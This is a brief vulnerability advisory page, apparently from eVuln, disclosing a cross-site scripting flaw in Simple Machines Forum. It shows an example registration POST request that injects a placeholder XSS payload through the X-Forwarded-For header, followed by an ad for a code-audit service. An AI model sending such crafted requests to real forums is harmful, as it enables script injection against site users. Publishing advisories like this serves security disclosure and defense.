PoC/Exploit for X-Forwarded-For XSS in Simple Machines Forum - SMF

Published Proof of Concept code - X-Forwarded-For XSS in Simple Machines Forum - SMF.

Description
Available
Solution
Not available - check vendor's website

Example of HTTP POST Query:

  • POST /smf/index.php?PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
  • Host: [host]
  • X-Forwarded-For: anyIP[XSS]
  • Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
  • Content-Length: 81
  •  
  • user=m&email=m@m.com&passwrd1=m&passwrd2=m&regagree=1&regSubmit=Register

Order PHP Code Analysis made by eVuln team

Defend against hacker attacks by source code audit of your website made by our team.The order will be done by specialists in website security.

Advisories by vuln type